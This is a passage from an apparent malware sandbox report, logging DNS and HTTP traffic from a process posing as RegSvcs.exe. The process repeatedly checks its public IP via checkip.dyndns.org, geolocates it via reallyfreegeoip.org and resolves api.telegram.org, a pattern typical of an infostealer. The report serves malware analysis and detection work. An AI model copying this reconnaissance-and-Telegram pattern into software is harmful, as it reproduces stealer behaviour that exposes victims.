                                              Sep 26, 2024 10:23:03.728307962 CEST | 1.1.1.1 | 192.168.2.4 | 0x9da5 | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                              Sep 26, 2024 10:23:13.030961990 CEST | 1.1.1.1 | 192.168.2.4 | 0x5bb7 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                              • reallyfreegeoip.org
                                              • api.telegram.org
                                              • checkip.dyndns.org
                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              0 | 192.168.2.4 | 49730 | 193.122.130.0 | 80 | 3152 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 10:23:03.113735914 CEST | 151 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 10:23:03.572737932 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:03 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 075d5ea961cf8ac703a51534428dd6e6
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 10:23:03.576543093 CEST | 127 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 10:23:03.676399946 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:03 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: afc676ef02340df0a564469df9215220
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 10:23:04.391239882 CEST | 127 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 10:23:04.490767002 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:04 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: ce504ab7b0b9f896ba2a1fa1313a4cad
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.2.4 | 49733 | 193.122.130.0 | 80 | 3152 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 10:23:05.115922928 CEST | 127 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 10:23:05.873536110 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:05 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: f97fb377d2035ff42293d860e1acf235
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              2 | 192.168.2.4 | 49735 | 193.122.130.0 | 80 | 3152 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 10:23:06.516117096 CEST | 127 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 10:23:06.980233908 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 0f193dedf069cffd45d8c20d556846b6
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              3 | 192.168.2.4 | 49737 | 193.122.130.0 | 80 | 3152 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 10:23:07.611140966 CEST | 151 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 10:23:08.065983057 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:08 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 0076f15c997cd7c0c54183b0a5167f94
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              4 | 192.168.2.4 | 49739 | 193.122.130.0 | 80 | 3152 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 10:23:08.658706903 CEST | 151 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 10:23:09.122798920 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:09 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 9bf3352ec31b9026ce011c30c39535fb
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              5 | 192.168.2.4 | 49741 | 193.122.130.0 | 80 | 3152 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 10:23:09.720248938 CEST | 151 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 10:23:10.193664074 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:10 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: a751cd6ad5f9e4dbf0dcb94539835bea
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              6 | 192.168.2.4 | 49743 | 193.122.130.0 | 80 | 3152 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 10:23:10.795315981 CEST | 151 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 10:23:11.272542953 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:11 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 4926607346794ff4677a9f8090e73621
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              7 | 192.168.2.4 | 49745 | 193.122.130.0 | 80 | 3152 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 10:23:11.918117046 CEST | 151 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 10:23:12.369131088 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:12 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: d516459e9eb7691d3ccce67d39ceb8e4
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              0 | 192.168.2.4 | 49731 | 188.114.96.3 | 443 | 3152 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-09-26 08:23:04 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 08:23:04 UTC | 683 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:04 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3816
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=46P%2BEO8Hhnq9ldgzNvY4PYN6mkb%2FuNX2u1ASysLq4tL70HatkdGah6QNumJ%2FFhCEBfDZ%2B02GNDh9TTYOVpI53K1Eg3lJf40Cu2IA6bSnVS0%2FRkY0T04rcFGbUTIw%2FsOW%2BEjxGuQk"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c91d98bf84c42b9-EWR
                                              2024-09-26 08:23:04 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | 3152 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-09-26 08:23:04 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-26 08:23:05 UTC | 671 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:05 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3817
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QkihJIwTzmH73zSMf52bNflD7lXf77z2yLKz9LNon6IldmQdO1JYI8UjZnBqhV67IPEhCJlnW%2FCCK7plhe53gVRGviTNfG0QjlEwWWCITJLekH5TEd6gDm2qoxggTpLxxLAFozLp"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c91d99089a8728d-EWR
                                              2024-09-26 08:23:05 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              2 | 192.168.2.4 | 49734 | 188.114.96.3 | 443 | 3152 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-09-26 08:23:06 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 08:23:06 UTC | 701 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:06 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3818
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PhLIDBSplExCVM3OAuhPz7Vhi0VS79pFbNRfmjlwA6IKfjoaq853lSITAiugF79AIYx6CK6bX8T%2FdB9DpPbbAqMFKNVAktGAlNNNGoxcRbAbUJnlBQ2xmduzGsJOnN8uaZE66apr"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c91d9994a8d7c6f-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-09-26 08:23:06 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID: 3 | Source: 192.168.2.4:49736 | Destination: 188.114.96.34:443 | PID: 3152 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-09-26 08:23:07 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 08:23:07 UTC | 677 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:07 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3819
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VuhpGE67h15emumKLrdrU3g9OrxgQU7eSGCKpf8EOycDIdqlqXjCKtlUS2YhtaD5MpiF%2Byew%2FZl0A7%2BHLtSRI790xb0Zcn3k8nl%2FX0FJ5bG2F8FSW8N8xYl8pbh6LxFKJ1Pe7bxn"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c91d9a0298b4316-EWR
                                              2024-09-26 08:23:07 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID: 4 | Source: 192.168.2.4:49738 | Destination: 188.114.96.34:443 | PID: 3152 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-09-26 08:23:08 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 08:23:08 UTC | 673 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:08 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3820
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=swxfKsdDHBNcYjsG6WXtJHrgIvj%2BvWRS6YRcThHYsDsTLeaazgn6YS%2FyYLcXMevOGzrMVLskOCFSHDSKCOjiK35eqZk6iwfMsazRGG5HGTJgKyQge4rBMYHBG1StR54oOB6pTta6"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c91d9a6bc7c1996-EWR
